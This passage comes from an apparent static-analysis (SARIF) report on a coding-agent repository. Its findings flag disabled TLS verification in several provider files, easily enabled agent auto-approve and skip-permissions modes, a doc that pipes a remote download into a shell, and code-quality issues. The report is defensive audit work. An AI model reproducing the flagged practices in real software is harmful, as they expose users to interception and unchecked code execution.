"http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_ssrf_guard.py"}, "region": {"startLine": 104}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 13489, "scanner": "repobility", "fingerprint": "3b8d51c6b223686b81b59895cc0875b4", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "fixed", "verdict": "likely_fp", "isResolved": true, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_ssrf_guard.py"}, "region": {"startLine": 99}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 13488, "scanner": "repobility", "fingerprint": "de0fecf0b7db613dfe7290fa0dd62339", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "fixed", "verdict": "likely_fp", "isResolved": true, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_ssrf_guard.py"}, "region": {"startLine": 95}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 13487, "scanner": "repobility", "fingerprint": "7289f5fdc00c8843c733adc762fc3e5a", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "fixed", "verdict": "likely_fp", "isResolved": true, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_ssrf_guard.py"}, "region": {"startLine": 47}}}]}, {"ruleId": "SEC014", "level": "warning", "message": {"text": "[SEC014] SSL Verification Disabled: SSL certificate verification is disabled, allowing man-in-the-middle attacks."}, "properties": {"repobilityId": 7264, "scanner": "repobility-threat-engine", "fingerprint": "b14a3b100a540b84ee5fa65871bc099693948b09cb120eac42b8dd129ed74776", "category": "crypto", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "verify=False", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC014", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|crypto|token|65|sec014"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/openrouter_provider.py"}, "region": {"startLine": 65}}}]}, {"ruleId": "SEC014", "level": "warning", "message": {"text": "[SEC014] SSL Verification Disabled: SSL certificate verification is disabled, allowing man-in-the-middle attacks."}, "properties": {"repobilityId": 7263, "scanner": "repobility-threat-engine", "fingerprint": "b23058708e73f48890e5990a7ba046be0001ec09234d81870d68af0ffa6ce889", "category": "crypto", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "verify=False", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC014", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|crypto|token|43|sec014"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/openai_provider.py"}, "region": {"startLine": 43}}}]}, {"ruleId": "SEC014", "level": "warning", "message": {"text": "[SEC014] SSL Verification Disabled: SSL certificate verification is disabled, allowing man-in-the-middle attacks."}, "properties": {"repobilityId": 7262, "scanner": "repobility-threat-engine", "fingerprint": "105ce1a856499b5e5575e78d30a67911f85e04067913fbac87e9d387c3e5c16d", "category": "crypto", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "verify=False", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC014", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|crypto|token|56|sec014"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/deepseek_provider.py"}, "region": {"startLine": 56}}}]}, {"ruleId": "ERR001", "level": "warning", "message": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG level."}, "properties": {"repobilityId": 7255, "scanner": "repobility-threat-engine", "fingerprint": "062e898d52c1f314c8435ee80b3fa631031628b4dc18c7767e638488e1a72105", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "fixed", "verdict": "confirmed", "isResolved": true, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "except Exception:\n pass", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|062e898d52c1f314c8435ee80b3fa631031628b4dc18c7767e638488e1a72105"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/session_storage.py"}, "region": {"startLine": 312}}}]}, {"ruleId": "ERR001", "level": "warning", "message": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG level."}, "properties": {"repobilityId": 7254, "scanner": "repobility-threat-engine", "fingerprint": "a21f782ddbd5f21075036c745319ecc9143db83c1499ca949706d49ae1374481", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "fixed", "verdict": "confirmed", "isResolved": true, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "except Exception:\n pass", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|a21f782ddbd5f21075036c745319ecc9143db83c1499ca949706d49ae1374481"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/token_estimation.py"}, "region": {"startLine": 162}}}]}, {"ruleId": "ERR001", "level": "warning", "message": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG level."}, "properties": {"repobilityId": 7253, "scanner": "repobility-threat-engine", "fingerprint": "2f87d68b2b4bb696ebd66d4e597350bdbb411d16a1c148c605bbd71dc38e29e0", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "fixed", "verdict": "confirmed", "isResolved": true, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "except Exception:\n pass", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|2f87d68b2b4bb696ebd66d4e597350bdbb411d16a1c148c605bbd71dc38e29e0"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/config.py"}, "region": {"startLine": 48}}}]}, {"ruleId": "AGT016", "level": "warning", "message": {"text": "Codex session log reader may expose prompts or tool-call content"}, "properties": {"repobilityId": 7252, "scanner": "repobility-agent-runtime", "fingerprint": "fbc8e48598afd5d7db5b75629238aa6d6ba8196ad6cd09ed403525b768bc4d3c", "category": "quality", "severity": "medium", "confidence": 0.73, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File reads Codex session JSONL or usage logs and references prompt/message/tool content without visible redaction controls.", "evidence": {"rule_id": "AGT016", "scanner": "repobility-agent-runtime", "references": [], "correlation_key": "fp|fbc8e48598afd5d7db5b75629238aa6d6ba8196ad6cd09ed403525b768bc4d3c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/session_storage.py"}, "region": {"startLine": 1}}}]}, {"ruleId": "AGT013", "level": "warning", "message": {"text": "Agent auto-approve or skip-permissions mode is easy to enable"}, "properties": {"repobilityId": 7250, "scanner": "repobility-agent-runtime", "fingerprint": "6fd8e57791bc6137581604b975c32334a1ea17687bd9514c197c5307b3011751", "category": "quality", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File exposes or configures a broad agent auto-approval mode without enough local guard wording.", "evidence": {"rule_id": "AGT013", "scanner": "repobility-agent-runtime", "references": [], "correlation_key": "fp|6fd8e57791bc6137581604b975c32334a1ea17687bd9514c197c5307b3011751"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/permissions/modes.py"}, "region": {"startLine": 93}}}]}, {"ruleId": "AGT013", "level": "warning", "message": {"text": "Agent auto-approve or skip-permissions mode is easy to enable"}, "properties": {"repobilityId": 7249, "scanner": "repobility-agent-runtime", "fingerprint": "cc332212c4ed16b6a4c80ca45c1c7605fe2389e42547e6f05ae0de55442d82f2", "category": "quality", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File exposes or configures a broad agent auto-approval mode without enough local guard wording.", "evidence": {"rule_id": "AGT013", "scanner": "repobility-agent-runtime", "references": [], "correlation_key": "fp|cc332212c4ed16b6a4c80ca45c1c7605fe2389e42547e6f05ae0de55442d82f2"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/entrypoints/tui.py"}, "region": {"startLine": 38}}}]}, {"ruleId": "AGT013", "level": "warning", "message": {"text": "Agent auto-approve or skip-permissions mode is easy to enable"}, "properties": {"repobilityId": 7248, "scanner": "repobility-agent-runtime", "fingerprint": "5dc06d9427d93ec0cd4a31126b24bc3e51ad75d2022fcb444081df7679f723dc", "category": "quality", "severity": "medium", "confidence": 0.68, "triageState": "fixed", "verdict": "likely", "isResolved": true, "reason": "File exposes or configures a broad agent auto-approval mode without enough local guard wording.", "evidence": {"rule_id": "AGT013", "scanner": "repobility-agent-runtime", "references": [], "correlation_key": "fp|5dc06d9427d93ec0cd4a31126b24bc3e51ad75d2022fcb444081df7679f723dc"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/entrypoints/headless.py"}, "region": {"startLine": 16}}}]}, {"ruleId": "AGT015", "level": "warning", "message": {"text": "Remote install command pipes network code directly to a shell"}, "properties": {"repobilityId": 7247, "scanner": "repobility-agent-runtime", "fingerprint": "a21a6c25ddfc8c7607d24dad7df2c19ac8a0c32f5e0fe781b82f6bf1d529c554", "category": "dependency", "severity": "medium", "confidence": 0.7, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File contains a remote download piped directly to a shell without visible checksum or signature verification.", "evidence": {"rule_id": "AGT015", "scanner": "repobility-agent-runtime", "references": [], "correlation_key": "fp|a21a6c25ddfc8c7607d24dad7df2c19ac8a0c32f5e0fe781b82f6bf1d529c554"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "claude-code-wiki/raw/claude-code-sourcemap-learning-notebook/en/03_permission_security.md"}, "region": {"startLine": 21}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 7246, "scanner": "repobility-ai-code-hygiene", "fingerprint": "025ca939922463a0a7a66fc5418ed5bd2a61028616843f6e5171005f69e9dd36", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "fixed", "verdict": "confirmed", "isResolved": true, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/tui/screens/exit_flow.py", "duplicate_line": 51, "correlation_key": "fp|025ca939922463a0a7a66fc5418ed5bd2a61028616843f6e5171005f69e9dd36"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/idle_return.py"}, "region": {"startLine": 52}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 7245, "scanner": "repobility-ai-code-hygiene", "fingerprint": "94ece1150a914dc863e9d3f10c5e36459463f4fb1442259a4f02d0f50ffaf70e", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "fixed", "verdict": "confirmed", "isResolved": true, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/tool_system/tools/edit.py", "duplicate_line": 236, "correlation_key": "fp|94ece1150a914dc863e9d3f10c5e36459463f4fb1442259a4f02d0f50ffaf70e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/write.py"}, "region": {"startLine": 165}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 7242, "scanner": "repobility-ai-code-hygiene", "fingerprint": "b6f0bbff3de0bcac41afa7f908a6ff732d6b3bf73eac79d4bd90b62ef568ae0f", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "fixed", "verdict": "confirmed", "isResolved": true, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/providers/anthropic_provider.py", "duplicate_line": 95, "correlation_key": "fp|b6f0bbff3de0bcac41afa7f908a6ff732d6b3bf73eac79d4bd90b62ef568ae0f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/minimax_provider.py"}, "region": {"startLine": 42}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 7241, "scanner": "repobility-ai-code-hygiene", "fingerprint": "1f8c11867c26c15af2a71d4e4c2da23daa39b206cb8a0149bf293d3b7918e64a", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "fixed", "verdict": "confirmed", "isResolved": true, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/providers/anthropic_provider.py", "duplicate_line": 117, "correlation_key": "fp|1f8c11867c26c15af2a71d4e4c2da23daa39b206cb8a0149bf293d3b7918e64a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/base.py"}, "region": {"startLine": 40}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 7240, "scanner": "repobility-ai-code-hygiene", "fingerprint": "96e5a0c2a7999d342f959e6170da6213ce09b2a64e8206a682e960a18948f97c", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "fixed", "verdict": "confirmed", "isResolved": true, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/providers/__init__.py", "duplicate_line": 16, "correlation_key": "fp|96e5a0c2a7999d342f959e6170da6213ce09b2a64e8206a682e960a18948f97c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/anthropic_provider.py"}, "region": {"startLine": 258}}}]}, {"ruleId": "CORE_NO_CI", "level": "warning", "message": {"text": "No CI/CD configuration found"}, "properties": {"repobilityId": 7235, "scanner": "repobility-core", "fingerprint": "ca5da3551af97272c4f099fc472740148135a15816b81b90bd862e8f91ec66ce", "category": "practices", "severity": "medium", "confidence": null, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"rule_id": "CORE_NO_CI", "scanner": "repobility-core", "correlation_key": "repo|practices|core_no_ci"}}}, {"ruleId": "COMP001", "level": "note", "message": {"text": "[COMP001] High cognitive complexity: Function `repair` has cognitive complexity 13 (SonarSource scale). Cognitive complexity measures how hard the function is for a human to understand \u2014 nested branches, boolean chains, and recursion all weigh in. Breakdown: continue=1, elif=1, for=1, if=3, nested_bonus=4, or=3."}, "properties": {"repobilityId": 46464, "scanner": "repobility-threat-engine", "fingerprint": "3d8efb34a91bff171e220c544cb493c39d067b4895159d1bb32dda944a775a5e", "category": "quality", "severity": "low", "confidence": 0.95, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "AST-derived cognitive complexity score = 13 (severity threshold for low: 8+).", "evidence": {"scanner": "repobility-threat-engine", "function": "repair", "breakdown": {"if": 3, "or": 3, "for": 1, "elif": 1, "continue": 1, "nested_bonus": 4}, "complexity": 13, "correlation_key": "fp|3d8efb34a91bff171e220c544cb493c39d067b4895159d1bb32dda944a775a5e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "eval/repair_preds.py"}, "region": {"startLine": 25}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 46362, "scanner": "repobility-ai-code-hygiene", "fingerprint": "25079231e86a51412e2abfea801acfd3b91eef659a005bd99a16ec3bce3523e7", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/tool_system/tools/glob.py", "duplicate_line": 9, "correlation_key": "fp|25079231e86a51412e2abfea801acfd3b91eef659a005bd99a16ec3bce3523e7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/grep.py"}, "region": {"startLine": 11}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 46361, "scanner": "repobility-ai-code-hygiene", "fingerprint": "b6b7ec295db2116f59def62809df6d0222fd738cea937e8a7d85693a3098cbfb", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/providers/anthropic_provider.py", "duplicate_line": 130, "correlation_key": "fp|b6b7ec295db2116f59def62809df6d0222fd738cea937e8a7d85693a3098cbfb"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/minimax_provider.py"}, "region": {"startLine": 46}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 46360, "scanner": "repobility-ai-code-hygiene", "fingerprint": "9a47daf541bf2d989c338e6e48b894ec307b2cd015175eaea972001c1d3081b8", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/providers/anthropic_provider.py", "duplicate_line": 149, "correlation_key": "fp|9a47daf541bf2d989c338e6e48b894ec307b2cd015175eaea972001c1d3081b8"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/base.py"}, "region": {"startLine": 43}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 46359, "scanner": "repobility-ai-code-hygiene", "fingerprint": "84204bbf291f1f6be25fe053852d07f6916d2965903a33e482951b0b77e11660", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/providers/__init__.py", "duplicate_line": 16, "correlation_key": "fp|84204bbf291f1f6be25fe053852d07f6916d2965903a33e482951b0b77e11660"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/anthropic_provider.py"}, "region": {"startLine": 305}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22039, "scanner": "repobility", "fingerprint": "133500109757a3883eb0429129d358d6", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_ws5_integration.py"}, "region": {"startLine": 70}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22038, "scanner": "repobility", "fingerprint": "1e5e8d14656f0d29571cec255e0e435c", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_git_context.py"}, "region": {"startLine": 32}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22037, "scanner": "repobility", "fingerprint": "d1d0445d7138952e1fccdee99fa5df28", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_git_utilities.py"}, "region": {"startLine": 31}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 7244, "scanner": "repobility-ai-code-hygiene", "fingerprint": "f0db9a18961e9293d03923c72cde85e23a96c03812c8a3b898b2515c93efe1c7", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/providers/__init__.py", "duplicate_line": 116, "correlation_key": "fp|f0db9a18961e9293d03923c72cde85e23a96c03812c8a3b898b2515c93efe1c7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/openrouter_provider.py"}, "region": {"startLine": 60}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 7243, "scanner": "repobility-ai-code-hygiene", "fingerprint": "5de1988db3654ad728101e5071ad2bf8502b29cbacf8c942e3a268cb6c293258", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/providers/__init__.py", "duplicate_line": 42, "correlation_key": "fp|5de1988db3654ad728101e5071ad2bf8502b29cbacf8c942e3a268cb6c293258"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/openai_provider.py"}, "region": {"startLine": 41}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 7239, "scanner": "repobility-ai-code-hygiene", "fingerprint": "9b2af9e01e51d62f769ce147037810353d7ec28f53536e70d0f78d1c1a4958eb", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/memdir/memdir.py", "duplicate_line": 141, "correlation_key": "fp|9b2af9e01e51d62f769ce147037810353d7ec28f53536e70d0f78d1c1a4958eb"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/memdir/team_mem_prompts.py"}, "region": {"startLine": 109}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 7238, "scanner": "repobility-ai-code-hygiene", "fingerprint": "2f20de5e9013cc3877ea317f361014db1d6c97528a947973d40568c0990e814b", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/hooks/hook_executor.py", "duplicate_line": 98, "correlation_key": "fp|2f20de5e9013cc3877ea317f361014db1d6c97528a947973d40568c0990e814b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/hooks/registry.py"}, "region": {"startLine": 125}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 7237, "scanner": "repobility-ai-code-hygiene", "fingerprint": "b1023e2c64d1d17d8575206eea950576c08541df1486e8e2bb67e79e762ad8ef", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/entrypoints/headless.py", "duplicate_line": 95, "correlation_key": "fp|b1023e2c64d1d17d8575206eea950576c08541df1486e8e2bb67e79e762ad8ef"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/entrypoints/tui.py"}, "region": {"startLine": 49}}}]}, {"ruleId": "AIC002", "level": "note", "message": {"text": "Source file name looks like an AI patch artifact"}, "properties": {"repobilityId": 7236, "scanner": "repobility-ai-code-hygiene", "fingerprint": "d5fe660f920896a7ff8ebe98d212c9fadd1f100b9e0e0d9194b7b8b7b2b38716", "category": "quality", "severity": "low", "confidence": 0.62, "triageState": "fixed", "verdict": "needs_review", "isResolved": true, "reason": "Source filename contains a temporary or patch-style suffix.", "evidence": {"suffix": "v2", "rule_id": "AIC002", "scanner": "repobility-ai-code-hygiene", "references": ["https://arxiv.org/abs/2601.15195"], "correlation_key": "fp|d5fe660f920896a7ff8ebe98d212c9fadd1f100b9e0e0d9194b7b8b7b2b38716"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/tasks_v2.py"}, "region": {"startLine": 1}}}]}, {"ruleId": "MINED072", "level": "none", "message": {"text": "[MINED072] Python Pass Only Class: class Foo: pass \u2014 stub waiting to be filled in."}, "properties": {"repobilityId": 46514, "scanner": "repobility-threat-engine", "fingerprint": "aeeeaca9bb36a5d6799a5c89a7ca0a64ff9165332579b9f65de45b0c83f89979", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-pass-only-class", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348069+00:00", "triaged_in_corpus": 10, "observations_count": 14245, "ai_coder_pattern_id": 143}, "scanner": "repobility-threat-engine", "correlation_key": "fp|aeeeaca9bb36a5d6799a5c89a7ca0a64ff9165332579b9f65de45b0c83f89979"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/widgets/select_list.py"}, "region": {"startLine": 98}}}]}, {"ruleId": "MINED072", "level": "none", "message": {"text": "[MINED072] Python Pass Only Class: class Foo: pass \u2014 stub waiting to be filled in."}, "properties": {"repobilityId": 46513, "scanner": "repobility-threat-engine", "fingerprint": "b0e99902d91a163c63e34d7eb10a6bca12a7150477ceede208f3bc99aa6f9e6d", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-pass-only-class", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348069+00:00", "triaged_in_corpus": 10, "observations_count": 14245, "ai_coder_pattern_id": 143}, "scanner": "repobility-threat-engine", "correlation_key": "fp|b0e99902d91a163c63e34d7eb10a6bca12a7150477ceede208f3bc99aa6f9e6d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/utils/ripgrep.py"}, "region": {"startLine": 49}}}]}, {"ruleId": "MINED072", "level": "none", "message": {"text": "[MINED072] Python Pass Only Class: class Foo: pass \u2014 stub waiting to be filled in."}, "properties": {"repobilityId": 46512, "scanner": "repobility-threat-engine", "fingerprint": "58d24c8bd71e4b8cf314beab0f2257b69162582fb87be63030eace030ca5f77d", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-pass-only-class", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348069+00:00", "triaged_in_corpus": 10, "observations_count": 14245, "ai_coder_pattern_id": 143}, "scanner": "repobility-threat-engine", "correlation_key": "fp|58d24c8bd71e4b8cf314beab0f2257b69162582fb87be63030eace030ca5f77d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/errors.py"}, "region": {"startLine": 4}}}]}, {"ruleId": "MINED077", "level": "none", "message": {"text": "[MINED077] Python Open No Context: fp = open(path) outside with-block leaks file handles."}, 